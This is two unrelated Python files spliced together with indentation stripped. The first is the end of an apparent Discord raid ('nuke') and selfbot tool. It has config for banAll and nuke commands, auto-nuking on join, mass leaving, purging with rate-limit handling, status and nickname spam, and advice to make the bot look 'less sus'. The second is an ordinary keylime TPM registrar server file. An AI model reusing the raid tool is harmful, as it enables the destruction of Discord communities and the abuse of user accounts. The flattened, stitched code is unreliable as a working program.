await log(ctx, f'Please enter the command you want to add after line `{len(settings["after"])}`.')
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['after'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['after'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter the line(s) that you want to remove from after commands.')
elif args[0] == 'insert':
if len(args) > 2 and args[1].isdigit():
if not (0 <= (index := int(args[1])) <= len(settings['after'])) or len(settings['after']) == 0:
await log(ctx, f'Line `{args[1]}` doesn\'t exist.')
return
settings['after'].insert(index, ' '.join(args[2:]))
await log(ctx, f'Added command after line `{args[1]}`.')
else:
await log(ctx, 'Insert usage: `after insert <after line #> <command...>`')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'after command(s) list', settings['after'])
else:
await log(ctx, f'Unknown operation: `{args[0]}`')
elif command == 'bot_status':
if args is None:
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bot_status',
description = f'Whenever the bot boot up the status will be set to a given status.\n\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value=f'{settings["bot_status"]}', inline=True)
embed.add_field(name='Features', value='bot_status', inline=True)
embed.add_field(name='Usage', value=f'`bot_status <on start status>` - set the on start status. Available on start status are `online`, `offline`, `idle`, and `dnd` or `do_not_disturb`. By default it is set to `offline`.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if (args := args.lower()) in ['online', 'offline', 'idle', 'dnd', 'do_not_disturb']:
settings['bot_status'] = args
                await log(ctx, f'On bot start status has been set to `{args}`.')
else:
await log(ctx, 'Available on start status are `online`, `offline`, `idle`, and `dnd` or `do_not_disturb`.')
elif command == 'bot_permission':
if args is None:
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bot_permission',
description = f'If you are using a selfbot, then you don\'t have to do anything to this section. This bot_permission section is for normal bot invite URL that will ask the person inviting it for permission/roles (ex. admin, server manager). The default is set to 2146958847, which asks for all permissions. If you want to make the bot less sus, you can remove the permissions that are not needed.\n\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Value', value=f'{settings["bot_permission"]}', inline=True)
embed.add_field(name='Features', value='bot_permission', inline=True)
            embed.add_field(name='Usage', value=f'`bot_permission <value>` - set permissions value to the given number. Use this [permission calculator](https://wizbot.cc/permissions-calculator/?v=0) to help you calculate the values. Note: if you are going to use that calculator all you need is to copy the number that is displayed at the top, and then use this command.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if args.isdigit() and 0 <= int(args) <= 2146958847:
settings['bot_permission'] = args
                await log(ctx, f'Bot permission has been set to `{args}`.')
else:
await log(ctx, 'Please enter a value between 0 and 2146958847.')
elif command == 'save':
def check(message: discord.Message):
return message.author.id == ctx.message.author.id
if args is None:
            await log(ctx, f'You need to name the file. Use `{settings["command_prefix"]}config save <file name>`.')
return
parent_dir = os.path.join(Path().absolute().__str__(), 'data')
config_path = os.path.join(parent_dir, args.translate(bad_filename_map))
if os.path.isfile(config_path):
            await log(ctx, f'Configuration file named {args} already exists. Do you want to overwrite it? [Y/n]')
while True:
try:
msg = (await client.wait_for('message', check=check, timeout=10)).content.lower()
if msg == 'y' or msg == 'yes':
with open(config_path, 'w') as f:
f.write(json.dumps(settings))
break
elif msg == 'n' or msg == 'no':
await log(ctx, f'Saving cancelled.')
return
await log(ctx, f'Yes or no.')
except (asyncio.exceptions.TimeoutError, discord.ext.commands.errors.CommandInvokeError):
await log(ctx, "Took too long to answer.")
return
else:
if not os.path.isdir(parent_dir):
os.mkdir(parent_dir)
with open(config_path, 'w+') as f:
f.write(json.dumps(settings))
global settings_copy
settings_copy = deepcopy(settings)
await log(ctx, 'Finished saving.')
elif command == 'verbose':
if args is None:
status_list = []
features_list = []
# hard coding this because I don't think there's a better way to set the values.
features_list.append('Log response from requests')
if want_log_request:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log messages in console')
if want_log_console:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log messages in discord chat')
if want_log_message:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log any errors')
if want_log_errors:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'verbose',
                description = f'Verbose is the log level. If you don\'t want any of the logs to spam rate-limiting errors or whatever errors the bot throws at you, you can disable them to prevent some lag.\n\nCurrent verbose value: `{str(settings["verbose"])}`\n:white_check_mark: = Enabled\n:x: = Disabled\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Logs', value='\n'.join(features_list), inline=True)
            embed.add_field(name='Usage', value=f'`verbose <value>` - enable and disable the logs. Subtract the values below from the current verbose value to disable the log(s) you want, and add the values to enable them back. For example, to disable "Log any errors" subtract 8 from 15 to get 7 and use 7 as the new verbose value; to also disable "Log response from requests" subtract 1 from 7 to get 6. To enable them again, just add 8 and 1 back to the current verbose value.\n\n`1` - Log response from requests\n`2` - Log messages in console\n`4` - Log messages in discord chat\n`8` - Log any errors.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if args.isdigit() and 0 <= (args := int(args)) <= 15:
settings['verbose'] = args
updateVerbose()
                await log(ctx, f'Verbose has been set to `{args}`.')
else:
await log(ctx, 'You can only enter a positve integer between or on 0 and 15.')
elif command == 'ban_whitelist':
if args is None:
status_list = []
features_list = []
features_list.append('ban_whitelist')
if len(settings['ban_whitelist']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Ban whitelist',
                description = f'Ban whitelist is used for telling `{settings["command_prefix"]}banAll` and `{settings["command_prefix"]}nuke` not to ban the users in the list. You can put a discord tag or a discord ID in the list, but it is recommended to use the discord ID because in the past there have been some uncheckable discord tags.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`ban_whitelist add <command>` - add user to the back of the command list\n\n`ban_whitelist remove <line number> [line number] [line...` - remove line(s) in the ban whitelist\n\n`ban_whitelist list [page number]` - list users that are in the ban whitelist', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'add':
if len(args) > 1:
text = ' '.join(args[1:])
settings['ban_whitelist'].append(text)
await log(ctx, f'User added. Character length: `{str(len(text))}`.')
else:
                    await log(ctx, f'Please enter the userID or userTag that you want to add after line `{str(len(settings["ban_whitelist"]))}`.')
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['ban_whitelist'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['ban_whitelist'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
                    await log(ctx, f'Enter line(s) to remove from the ban whitelist.')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'ban whitelist', settings['ban_whitelist'])
else:
await log(ctx, f'Unknown operation: `{args[0]}`')
elif command == 'proxies':
        await log(ctx, 'This feature has been disabled for now due to unhandled slow/bad proxies.')
elif command == 'prefix' or command == 'command_prefix':
if args is None:
            await log(ctx, f'Use `` {settings["command_prefix"]}config command_prefix <command_prefix> ``')
else:
settings['command_prefix'] = client.command_prefix = args
await log(ctx, 'Command prefix changed.')
elif command == 'token':
if args is None:
await log(ctx, 'Usage: `token <new token>` - new token for this config. Restarting the bot will be required. And remember to save the config before restarting.')
else:
settings['token'] = args
await log(ctx, 'New token has been set.')
else:
await log(ctx, f'Unable to find the config. `{command}`')
## Additional functions ##
@commands.check(checkPerm)
@client.command(name='checkRolePermissions', aliases=['check', 'crp'])
async def checkRolePermissions(ctx, name, n='1'):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n) - 1) < 0:
await log(ctx, 'Bad page number.')
return
member_ = containing(selected_server.members, nameIdHandler(name))
if member_ is None:
        await log(ctx, f'Unable to find `{name}`.')
return
value = member_.guild_permissions.value
temp = sorted(member_.guild_permissions, key=lambda p: p)
master_list = ''
    item_length = len(temp) # Number of permission flags
init_item = n * per_page
final_item = init_item + per_page
if init_item > item_length - per_page:
if init_item > item_length:
await ctx.send('Invalid page number.')
return
final_item = init_item + (item_length % per_page)
else:
final_item = init_item + per_page
for i in range(init_item, final_item, 1):
item, has_perm = temp[i]
if has_perm:
master_list += ':white_check_mark: '
else:
master_list += ':x: '
master_list += item.replace('_', ' ').capitalize() + '\n'
# if not isDM(ctx) and ctx.guild.id == selected_server.id and 1 << 11 & selected_server.me.guild_permissions.value == 0:
# consoleLog('\n%s*Check role permissions*\n%sPermission value -> %s%d : 2147483647\n%s %s%d/%d' % (Fore.CYAN, Fore.RESET, Fore.YELLOW, value, master_list.replace(':white_check_mark:', f'{Fore.GREEN}+').replace(':x:', f'{Fore.RED}-'), Fore.YELLOW, n+1, ceil(item_length / per_page)), True)
# else:
try:
embed = discord.Embed(
title = 'User permissions',
description = f'Encoded value: {str(value)} : 2147483647',
color = discord.Color.red()
)
embed.add_field(name='Permissions', value=master_list, inline=True)
embed.set_footer(text=f'{str(n+1)}/{str(ceil(item_length / per_page))}')
await ctx.send(embed=embed)
except:
await ctx.send('```diff\n%s %d/%d```' % (master_list.replace(':white_check_mark:', '+').replace(':x:', '-'), n+1, ceil(item_length / per_page)))
@commands.check(checkPerm)
@client.command(name='serverIcon', aliases=['si', 'changeServerIcon'])
async def serverIcon(ctx, path=None):
if not await hasTarget(ctx):
return
if path is None:
await selected_server.edit(icon=None)
await log(ctx, f'Successfully removed the server icon from `{selected_server.name}`.')
elif path.startswith(('https://', 'http://', 'ftp://', 'ftps://')): # Link EX: https://www.example.com/aaa.png
try:
await selected_server.edit(icon=BytesIO(requests.get(path).content).read())
consoleLog('Successfully changed the current server icon.')
except:
consoleLog(f'Unable to change the server icon to "{path}".')
elif path[0] == '<': # EX: <a:triggeredd:627060014431076352>
path = path.split(':')
try:
if path[0] == '<a': # Animated
await selected_server.edit(icon=discord.File(BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{path[2][:-1]}.gif?v=1').content).read()))
else:
await selected_server.edit(icon=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{path[2][:-1]}.png?v=1').content).read())
await log(ctx, 'Successfully changed server icon.')
except:
raise
elif os.path.isfile(path): # File EX: C:\Users\user\Desktop\something.jpg or EX: .\icon\something.jpg
with open(path, 'rb') as data:
await selected_server.edit(icon=data.read())
await log(ctx, 'Successfully changed server icon.')
else:
try:
unicode_number = str(ord(path)) + ', '
except:
unicode_number = ''
unicode_string = path.encode('utf8')
sys.stdout.buffer.write(f'"{path}" is not supported to be set as a server icon.'.encode('utf8'))
consoleLog(unicode_number)
await log(ctx, f'{path} is not supported to be set as a server icon.')
await log(ctx, f'Character\'s bytes: {unicode_number}{unicode_string}')
@commands.check(checkPerm)
@client.command(name='serverName', aliases=['sn', 'changeServerName'])
async def serverName(ctx, *, name):
if not await hasTarget(ctx):
return
try:
await selected_server.edit(name=name)
await log(ctx, f'Server name has been changed to `{name}`.')
except discord.errors.Forbidden:
await log(ctx, 'Unable to change server name.')
raise
except:
raise
@commands.check(checkPerm)
@client.command(name='purge', aliases=['clear'])
async def purge(ctx, n=None):
if not await hasTarget(ctx):
return
consoleLog('Purging messages...', True)
if n is not None and (not n.isdigit() or (n := int(n)) < 1):
await log(ctx, 'Please enter a positive integer.')
return
to_delete_messages = await ctx.channel.history(limit=n).flatten()
    consoleLog('Due to Discord rate limiting, purging cannot run at a fast pace; the delay between deletions is adjusted automatically whenever a rate limit is hit.', True)
delay_time = 0
for message in to_delete_messages:
while True:
await asyncio.sleep(delay_time)
r = requests.delete(f'https://discord.com/api/v8/channels/{ctx.channel.id}/messages/{message.id}', headers=headers)
if r.status_code == 429:
delay_time = r.json()['retry_after']
                consoleLog(f'Rate limit reached. Purging delay has been set to -> {str(delay_time)} seconds')
else:
break
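# A minimal, self-contained sketch (not wired into any command) of the same
# 429-handling pattern purge() uses above: retry the DELETE until Discord stops
# rate limiting, sleeping for the server-provided retry_after value. The url and
# request_headers are whatever the caller passes in; nothing here is new API.
async def _delete_with_backoff(url, request_headers):
    delay_time = 0
    while True:
        await asyncio.sleep(delay_time)
        r = requests.delete(url, headers=request_headers)
        if r.status_code != 429:
            return r
        delay_time = r.json()['retry_after']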
@commands.check(checkPerm)
@client.command(name='leave')
async def leave(ctx, name=None):
if name is None:
if not await hasTarget(ctx):
return
await selected_server.leave()
else:
server = containing(client.guilds, name)
if server is None:
await log(ctx, f'Unable to find server {name}.')
return
await server.leave()
if not isDM(ctx) and ctx.guild.id == selected_server.id:
consoleLog(f'{Fore.BLUE}Goodbye {selected_server.name}! {Fore.YELLOW}-> {Fore.GREEN}Left {Fore.RESET}{selected_server.name}.', True)
else:
await log(ctx, f'Goodbye {selected_server.name}! -> Left {selected_server.name}.')
@commands.check(checkPerm)
@client.command(name='leaveAll')
async def leaveAll(ctx):
await log(ctx, 'Leaving all servers. Note: You won\'t be able to message me after I left all servers.')
for server in client.guilds:
await server.leave()
consoleLog('Left all servers.', True)
@commands.check(checkPerm)
@client.command(name='joinNuke', aliases=['nukeOnJoin', 'join nuke'])
async def joinNuke(ctx, true_or_false):
global saved_ctx, nuke_on_join
if true_or_false.lower() == 'true':
saved_ctx = ctx
nuke_on_join = True
await log(ctx, 'Nuke on bot joining a new server has been turned on.')
elif true_or_false.lower() == 'false':
nuke_on_join = False
await log(ctx, 'Nuke on bot joining a new server has been turned off.')
else:
await log(ctx, 'Invalid flag: true or false. Note: true or false is not case sensitive.')
@commands.check(checkPerm)
@client.command(name='changeStatus', aliases=['cs'])
async def changeStatus(ctx, status):
if status == 'offline':
await client.change_presence(status=discord.Status.offline)
elif status == 'invisible':
await client.change_presence(status=discord.Status.invisible)
elif status == 'online':
await client.change_presence(status=discord.Status.online)
elif status == 'idle':
await client.change_presence(status=discord.Status.idle)
elif status == 'dnd' or status == 'do_not_disturb':
await client.change_presence(status=discord.Status.do_not_disturb)
@commands.check(checkPerm)
@client.command(name='link', aliases=['l'])
async def link(ctx):
if not is_selfbot:
await ctx.channel.send(f'https://discord.com/api/oauth2/authorize?client_id={client.user.id}&permissions={settings["bot_permission"]}&scope=bot')
else:
await log(ctx, f'This account is not a bot :). You can join servers with invite codes.')
@commands.check(checkPerm)
@client.command(name='autoNick', aliases=['an'])
async def autoNick(ctx):
if not await hasTarget(ctx):
return
global auto_nick
if not auto_nick:
consoleLog(f'{Fore.CYAN}Auto nickname is on.', True)
auto_nick = True
while auto_nick:
# payload = {'nick': ''.join(choice(alphanum) for _ in range(10))}
# q.put((requests.patch, f'https://discord.com/api/v8/guilds/{selected_server.id}/members/%40me/nick', headers, payload))
await selected_server.me.edit(nick=''.join(choices(alphanum, k=10)))
else:
consoleLog(f'{Fore.BLUE}Auto nickname is off.', True)
auto_nick = False
@commands.check(checkPerm)
@client.command(name='autoStatus', aliases=['as'])
async def autoStatus(ctx):
global auto_status
if not auto_status:
consoleLog(f'{Fore.CYAN}Auto status is on.', True)
auto_status = True
while auto_status:
await client.change_presence(status=discord.Status.online)
            await asyncio.sleep(random() + 0.3) # There's a rate limit for changing status (every minute or every 5 minutes; the exact number is unclear), so keep this sleep in place
await client.change_presence(status=discord.Status.offline)
await asyncio.sleep(random() + 0.3)
else:
consoleLog(f'{Fore.BLUE}Auto status is off.', True)
auto_status = False
@commands.check(checkPerm)
@client.command(name='off', aliases=['logout', 'logoff', 'shutdown', 'stop'])
async def off(ctx):
    ### Discord can take a while to show the bot as offline, so users may think the bot did not shut down when Discord simply has not updated its presence yet
await changeStatus(None, 'offline')
await client.logout()
###### Closing handler ######
###### https://github.com/aio-libs/aiohttp/issues/4324
from functools import wraps
from asyncio.proactor_events import _ProactorBasePipeTransport
def silence_event_loop_closed(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except RuntimeError as e:
if str(e) != 'Event loop is closed':
raise
return wrapper
_ProactorBasePipeTransport.__del__ = silence_event_loop_closed(_ProactorBasePipeTransport.__del__)
# PrivilegedIntents fixed fail :')
# async def login():
# global client
# try:
# await client.start(settings['token'], bot=not is_selfbot)
# except discord.PrivilegedIntentsRequired:
# print('PrivilegedIntentsRequired: This field is required to request for a list of members in the discord server that the bot is connected to. Watch https://youtu.be/DXnEFoHwL1A?t=44 to see how to turn on the required field.')
# # exit()
# client._connection = client._get_state(
# intents=client.intents.default()
# ) # reset intents to default
# input('lol')
# await login()
# except Exception as e:
# print(e)
# finally:
# sys.stdout.write('Exiting... \n')
# asyncio.run(login()) # if login failed because of the privileged intents then ask if user wants to turn off the intents
try:
client.run(settings['token'], bot=not is_selfbot)
except discord.PrivilegedIntentsRequired:
    print('PrivilegedIntentsRequired: Privileged intents are required to request the list of members in the Discord servers the bot is connected to. Watch https://youtu.be/DXnEFoHwL1A?t=44 to see how to turn on the required field.')
exit()
except Exception as e:
print(e)
finally:
sys.stdout.write('Exiting... \n')
|
registrar_common.py
|
'''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
'''
import base64
import ipaddress
import threading
import sys
import signal
import time
import http.server
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy.orm.exc import NoResultFound
from cryptography.hazmat.backends import default_backend
from cryptography.x509 import load_der_x509_certificate
import simplejson as json
from keylime.db.registrar_db import RegistrarMain
from keylime.db.keylime_db import DBEngineManager, SessionManager
from keylime import cloud_verifier_common
from keylime import config
from keylime import crypto
from keylime.tpm import tpm2_objects
from keylime import keylime_logging
from keylime.tpm.tpm_main import tpm
from keylime import api_version as keylime_api_version
logger = keylime_logging.init_logging('registrar')
try:
engine = DBEngineManager().make_engine('registrar')
except SQLAlchemyError as err:
logger.error('Error creating SQL engine: %s', err)
sys.exit(1)
class ProtectedHandler(BaseHTTPRequestHandler, SessionManager):
def do_HEAD(self):
"""HEAD not supported"""
config.echo_json_response(self, 405, "HEAD not supported")
def do_PATCH(self):
"""PATCH not supported"""
config.echo_json_response(self, 405, "PATCH not supported")
def do_GET(self):
"""This method handles the GET requests to retrieve status on agents from the Registrar Server.
Currently, only agents resources are available for GETing, i.e. /agents. All other GET uri's
will return errors. agents requests require a single agent_id parameter which identifies the
agent to be returned. If the agent_id is not found, a 404 response is returned.
"""
session = SessionManager().make_session(engine)
rest_params = config.get_restful_params(self.path)
if rest_params is None:
config.echo_json_response(
self, 405, "Not Implemented: Use /agents/ interface")
return
if not rest_params["api_version"]:
config.echo_json_response(self, 400, "API Version not supported")
return
if "agents" not in rest_params:
config.echo_json_response(self, 400, "uri not supported")
logger.warning('GET returning 400 response. uri not supported: %s', self.path)
return
agent_id = rest_params["agents"]
if agent_id is not None:
try:
agent = session.query(RegistrarMain).filter_by(
agent_id=agent_id).first()
            except SQLAlchemyError as e:
                logger.error('SQLAlchemy Error: %s', e)
                raise
if agent is None:
config.echo_json_response(self, 404, "agent_id not found")
logger.warning('GET returning 404 response. agent_id %s not found.', agent_id)
return
if not agent.active:
config.echo_json_response(self, 404, "agent_id not yet active")
logger.warning('GET returning 404 response. agent_id %s not yet active.', agent_id)
return
response = {
'aik_tpm': agent.aik_tpm,
'ek_tpm': agent.ek_tpm,
'ekcert': agent.ekcert,
'ip': agent.ip,
'port': agent.port,
'regcount': agent.regcount,
}
if agent.virtual:
response['provider_keys'] = agent.provider_keys
config.echo_json_response(self, 200, "Success", response)
logger.info('GET returning 200 response for agent_id: %s', agent_id)
else:
# return the available registered uuids from the DB
json_response = session.query(RegistrarMain.agent_id).all()
return_response = [item[0] for item in json_response]
config.echo_json_response(self, 200, "Success", {
'uuids': return_response})
logger.info('GET returning 200 response for agent_id list')
return
def do_POST(self):
"""POST not supported"""
config.echo_json_response(
self, 405, "POST not supported via TLS interface")
def do_PUT(self):
"""PUT not supported"""
config.echo_json_response(
self, 405, "PUT not supported via TLS interface")
def do_DELETE(self):
"""This method handles the DELETE requests to remove agents from the Registrar Server.
Currently, only agents resources are available for DELETEing, i.e. /agents. All other DELETE uri's will return errors.
agents requests require a single agent_id parameter which identifies the agent to be deleted.
"""
session = SessionManager().make_session(engine)
rest_params = config.get_restful_params(self.path)
if rest_params is None:
config.echo_json_response(
self, 405, "Not Implemented: Use /agents/ interface")
return
if not rest_params["api_version"]:
config.echo_json_response(self, 400, "API Version not supported")
return
if "agents" not in rest_params:
config.echo_json_response(self, 400, "URI not supported")
logger.warning('DELETE agent returning 400 response. uri not supported: %s', self.path)
return
agent_id = rest_params["agents"]
if agent_id is not None:
if session.query(RegistrarMain).filter_by(agent_id=agent_id).delete():
# send response
try:
session.commit()
except SQLAlchemyError as e:
logger.error('SQLAlchemy Error: %s', e)
config.echo_json_response(self, 200, "Success")
return
# send response
config.echo_json_response(self, 404)
return
config.echo_json_response(self, 404)
# pylint: disable=W0622
def log_message(self, format, *args):
return
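# A minimal client-side sketch (not part of keylime) of the GET interface the
# handler above serves over mTLS: fetch one agent's registration record, or the
# list of registered uuids when no agent_id is given. The '/v<version>/agents'
# path layout and the caller-supplied ssl_context are assumptions here -- the
# real path parsing lives in config.get_restful_params(), which is not shown.
def _example_get_agent(host, tlsport, ssl_context, api_version, agent_id=None):
    import http.client
    path = '/v%s/agents' % api_version
    if agent_id is not None:
        path = '%s/%s' % (path, agent_id)
    conn = http.client.HTTPSConnection(host, tlsport, context=ssl_context)
    conn.request('GET', path)
    response = conn.getresponse()
    body = json.loads(response.read())  # JSON envelope produced by config.echo_json_response
    conn.close()
    return response.status, body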
class UnprotectedHandler(BaseHTTPRequestHandler, SessionManager):
def do_HEAD(self):
"""HEAD not supported"""
config.echo_json_response(self, 405, "HEAD not supported")
def do_PATCH(self):
"""PATCH not supported"""
config.echo_json_response(self, 405, "PATCH not supported")
def do_GET(self):
"""This method handles the GET requests to the unprotected side of the Registrar Server
Currently the only supported path is /versions which shows the supported API versions
"""
rest_params = config.get_restful_params(self.path)
if rest_params is None:
config.echo_json_response(
self, 405, "Not Implemented: Use /version/ interface")
return
if "version" not in rest_params:
config.echo_json_response(self, 400, "URI not supported")
logger.warning('GET agent returning 400 response. URI not supported: %s', self.path)
return
version_info = {
"current_version": keylime_api_version.current_version(),
"supported_versions": keylime_api_version.all_versions(),
}
config.echo_json_response(self, 200, "Success", version_info)
def do_POST(self):
"""This method handles the POST requests to add agents to the Registrar Server.
Currently, only agents resources are available for POSTing, i.e. /agents. All other POST uri's
        will return errors. POST requests require an agent_id identifying the agent to add, and a json
        block sent in the body with two entries: ekcert and aik_tpm.
"""
session = SessionManager().make_session(engine)
rest_params = config.get_restful_params(self.path)
if rest_params is None:
config.echo_json_response(
self, 405, "Not Implemented: Use /agents/ interface")
return
if not rest_params["api_version"]:
config.echo_json_response(self, 400, "API Version not supported")
return
if "agents" not in rest_params:
config.echo_json_response(self, 400, "uri not supported")
logger.warning('POST agent returning 400 response. uri not supported: %s', self.path)
return
agent_id = rest_params["agents"]
if agent_id is None:
config.echo_json_response(self, 400, "agent id not found in uri")
logger.warning('POST agent returning 400 response. agent id not found in uri %s', self.path)
return
try:
content_length = int(self.headers.get('Content-Length', 0))
if content_length == 0:
config.echo_json_response(
self, 400, "Expected non zero content length")
logger.warning('POST for %s returning 400 response. Expected non zero content length.', agent_id)
return
post_body = self.rfile.read(content_length)
json_body = json.loads(post_body)
ekcert = json_body['ekcert']
aik_tpm = json_body['aik_tpm']
initialize_tpm = tpm()
if ekcert is None or ekcert == 'emulator':
                logger.warning('Agent %s did not submit an ekcert', agent_id)
ek_tpm = json_body['ek_tpm']
else:
if 'ek_tpm' in json_body:
# This would mean the agent submitted both a non-None ekcert, *and*
# an ek_tpm... We can deal with it by just ignoring the ek_tpm they sent
                    logger.warning('Overriding ek_tpm for agent %s from ekcert', agent_id)
# If there's an EKCert, we just overwrite their ek_tpm
# Note, we don't validate the EKCert here, other than the implicit
# "is it a valid x509 cert" check. So it's still untrusted.
# This will be validated by the tenant.
ek509 = load_der_x509_certificate(
base64.b64decode(ekcert),
backend=default_backend(),
)
ek_tpm = base64.b64encode(
tpm2_objects.ek_low_tpm2b_public_from_pubkey(
ek509.public_key(),
)
)
aik_attrs = tpm2_objects.get_tpm2b_public_object_attributes(
base64.b64decode(aik_tpm),
)
if aik_attrs != tpm2_objects.AK_EXPECTED_ATTRS:
config.echo_json_response(
self, 400, "Invalid AK attributes")
logger.warning(
"Agent %s submitted AIK with invalid attributes! %s (provided) != %s (expected)",
agent_id,
tpm2_objects.object_attributes_description(aik_attrs),
tpm2_objects.object_attributes_description(tpm2_objects.AK_EXPECTED_ATTRS),
)
return
# try to encrypt the AIK
(blob, key) = initialize_tpm.encryptAIK(
agent_id,
base64.b64decode(ek_tpm),
base64.b64decode(aik_tpm),
)
# special behavior if we've registered this uuid before
regcount = 1
try:
agent = session.query(RegistrarMain).filter_by(
agent_id=agent_id).first()
except NoResultFound:
agent = None
except SQLAlchemyError as e:
logger.error('SQLAlchemy Error: %s', e)
raise
if agent is not None:
# keep track of how many ek-ekcerts have registered on this uuid
regcount = agent.regcount
if agent.ek_tpm != ek_tpm or agent.ekcert != ekcert:
logger.warning('WARNING: Overwriting previous registration for this UUID with new ek-ekcert pair!')
regcount += 1
# force overwrite
logger.info('Overwriting previous registration for this UUID.')
try:
session.query(RegistrarMain).filter_by(
agent_id=agent_id).delete()
session.commit()
except SQLAlchemyError as e:
logger.error('SQLAlchemy Error: %s', e)
raise
# Check for ip and port
contact_ip = json_body.get('ip', None)
contact_port = json_body.get('port', None)
# Validate ip and port
if contact_ip is not None:
try:
# Use parser from the standard library instead of implementing our own
ipaddress.ip_address(contact_ip)
except ValueError:
logger.warning(f"Contact ip for agent {agent_id} is not a valid ip got: {contact_ip}.")
contact_ip = None
if contact_port is not None:
try:
contact_port = int(contact_port)
if contact_port < 1 or contact_port > 65535:
logger.warning(f"Contact port for agent {agent_id} is not a number between 1 and got: {contact_port}.")
contact_port = None
except ValueError:
logger.warning(f"Contact port for agent {agent_id} is not a valid number got: {contact_port}.")
contact_port = None
# Add values to database
d = {}
d['agent_id'] = agent_id
d['ek_tpm'] = ek_tpm
d['aik_tpm'] = aik_tpm
d['ekcert'] = ekcert
d['ip'] = contact_ip
d['port'] = contact_port
d['virtual'] = int(ekcert == 'virtual')
d['active'] = int(False)
d['key'] = key
d['provider_keys'] = {}
d['regcount'] = regcount
try:
session.add(RegistrarMain(**d))
session.commit()
except SQLAlchemyError as e:
logger.error('SQLAlchemy Error: %s', e)
raise
response = {
'blob': blob,
}
config.echo_json_response(self, 200, "Success", response)
logger.info('POST returning key blob for agent_id: %s', agent_id)
except Exception as e:
config.echo_json_response(self, 400, "Error: %s" % e)
logger.warning("POST for %s returning 400 response. Error: %s", agent_id, e)
logger.exception(e)
def do_PUT(self):
"""This method handles the PUT requests to add agents to the Registrar Server.
Currently, only agents resources are available for PUTing, i.e. /agents. All other PUT uri's
will return errors.
"""
session = SessionManager().make_session(engine)
rest_params = config.get_restful_params(self.path)
if rest_params is None:
config.echo_json_response(
self, 405, "Not Implemented: Use /agents/ interface")
return
if not rest_params["api_version"]:
config.echo_json_response(self, 400, "API Version not supported")
return
if "agents" not in rest_params:
config.echo_json_response(self, 400, "uri not supported")
logger.warning('PUT agent returning 400 response. uri not supported: %s', self.path)
return
agent_id = rest_params["agents"]
if agent_id is None:
config.echo_json_response(self, 400, "agent id not found in uri")
logger.warning('PUT agent returning 400 response. agent id not found in uri %s', self.path)
return
try:
content_length = int(self.headers.get('Content-Length', 0))
if content_length == 0:
config.echo_json_response(
self, 400, "Expected non zero content length")
logger.warning('PUT for %s returning 400 response. Expected non zero content length.', agent_id)
return
post_body = self.rfile.read(content_length)
json_body = json.loads(post_body)
auth_tag = json_body['auth_tag']
try:
agent = session.query(RegistrarMain).filter_by(
agent_id=agent_id).first()
except NoResultFound as e:
raise Exception(
"attempting to activate agent before requesting "
"registrar for %s" % agent_id) from e
except SQLAlchemyError as e:
logger.error('SQLAlchemy Error: %s', e)
raise
if config.STUB_TPM:
try:
session.query(RegistrarMain).filter(RegistrarMain.agent_id == agent_id).update(
{'active': True})
session.commit()
except SQLAlchemyError as e:
logger.error('SQLAlchemy Error: %s', e)
raise
else:
# TODO(kaifeng) Special handling should be removed
if engine.dialect.name == "mysql":
agent.key = agent.key.encode('utf-8')
ex_mac = crypto.do_hmac(agent.key, agent_id)
if ex_mac == auth_tag:
try:
session.query(RegistrarMain).filter(RegistrarMain.agent_id == agent_id).update(
{'active': True})
session.commit()
except SQLAlchemyError as e:
logger.error('SQLAlchemy Error: %s', e)
raise
else:
raise Exception(
f"Auth tag {auth_tag} does not match expected value {ex_mac}")
config.echo_json_response(self, 200, "Success")
logger.info('PUT activated: %s', agent_id)
except Exception as e:
